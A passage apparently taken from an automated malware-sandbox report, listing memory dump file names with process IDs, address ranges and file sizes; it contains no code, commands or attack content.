                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2880-527-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2888-682-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2920-672-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2972-536-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2976-377-0x0000000001140000-0x00000000012D6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.6MB

                                                                                                                                                                  • memory/2976-393-0x000007FEF2760000-0x000007FEF2782000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2980-148-0x000000001ABA0000-0x000000001ABAE000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    56KB

                                                                                                                                                                  • memory/2980-107-0x0000000000010000-0x0000000000194000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.5MB

                                                                                                                                                                  • memory/2980-149-0x000000001AD10000-0x000000001AD1A000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    40KB

                                                                                                                                                                  • memory/2980-150-0x000000001AD20000-0x000000001AD2C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    48KB

                                                                                                                                                                  • memory/2980-108-0x0000000001F80000-0x0000000001F8E000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    56KB

                                                                                                                                                                  • memory/2980-143-0x0000000002150000-0x000000000216C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    112KB

                                                                                                                                                                  • memory/2980-147-0x000000001AB90000-0x000000001AB9E000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    56KB

                                                                                                                                                                  • memory/2980-144-0x0000000002170000-0x0000000002178000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/2980-145-0x000000001AB70000-0x000000001AB86000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    88KB

                                                                                                                                                                  • memory/2980-146-0x0000000002180000-0x0000000002190000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB